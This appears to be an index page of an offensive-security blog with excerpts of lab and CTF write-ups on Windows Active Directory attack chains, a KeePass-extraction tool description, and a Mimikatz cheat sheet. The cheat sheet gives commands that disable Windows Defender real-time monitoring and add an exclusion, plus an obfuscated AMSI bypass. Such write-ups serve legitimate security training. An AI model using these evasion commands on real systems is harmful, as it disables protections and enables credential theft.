Vulnlab - Kaiju
Kaiju is a Hard chain made up of three Windows machines, where you have to exploit various advanced techniques to compromise the domain. Initial access is gained through the use of default credentials on an FTP server, retrieving files that give an insight into how administrators construct their passwords. By building a wordlist from this information, it is possible to compromise the backup account, which provides SSH access to the machine. Then, by browsing the FileZilla FTP server logs, we ...
KeeFarce Reborn
1. Introduction. KeeFarce Reborn is an offensive tool for extracting the contents of an unencrypted KeePass database when it is opened on the target machine. It is based on the work of several well-known projects: KeeFarce (extraction via DLL injection and ClrMD), KeeThief (master key recovery) and KeePassHax (decryption via reflection). The aim of KeeFarce Reborn is to simplify and modernize the method, while remaining compatible with as many environments as possible. 2. How it works. The tool takes t...
Vulnlab - Intercept
Intercept is a chain of two Windows servers. Initial access is gained via an SCF attack, which compromises a domain user account. With this access, several notable elements are observed: the domain controller does not enforce LDAP signing, the compromised user has the rights needed to join a machine to the domain, and one of the servers is vulnerable to PetitPotam and has the WebClient service enabled. By combining these weaknesses, a relay attack (RBCD) can be ...
Vulnlab - Tengu
Tengu is a medium-difficulty chain consisting of one Linux machine and two Windows machines. A Node-RED instance was used to execute code on the Linux machine. A database password recovered from it was then used to compromise a domain account, which was an administrator on the Linux machine. The latter had constrained delegation for the MSSQL service, making it possible to compromise the associated MSSQL server. Finally, by recovering information protected by DPAPI, it was possible to ...
Mimikatz CheatSheet
Environment preparation. Run as administrator:
Start-Process PowerShell_ISE -Verb RunAs
Add-MpPreference -ExclusionPath "C:\Temp"
Set-MpPreference -DisableRealtimeMonitoring $true
Import-Module C:\Temp\Invoke-Mimikatz.ps1
If Windows Defender cannot be disabled, use an AMSI bypass:
S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`...
Vulnlab - Reflection
Reflection is a chain of three Windows machines: MS01, WS01 and DC01. Initial access is via an SMB connection to MS01, which provides credentials to access an MSSQL database. These are used to retrieve the database’s service account and, using an NTLM Relay attack, to access the DC’s prod share, which contains the credentials of abbie.smith, a domain account. As this account has GenericAll rights on MS01, it can read the LAPS password and retrieve the credentials of the Georgia.Price account on ...
THM - Stealth
Initial access
We start by running an nmap scan to identify open ports on the target machine.
Nmap scan report for 10.10.145.204
Host is up (0.068s latency).
Not shown: 994 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-06-26T14:08:53+00:00; +1s from...
THM - K2
K2 is a hard room made up of a network containing a Linux machine and two Windows machines with an AD. It lets you practise basic attacks against security equipment that you must try to bypass in order to achieve your goals.
Enumeration
As usual, we start by running an nmap scan to identify the machine’s open ports.
└─$ nmap -A 10.10.18.124 -oA scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-21 15:50 EDT
Nmap scan report for k2.thm (10.10.18.124)
H...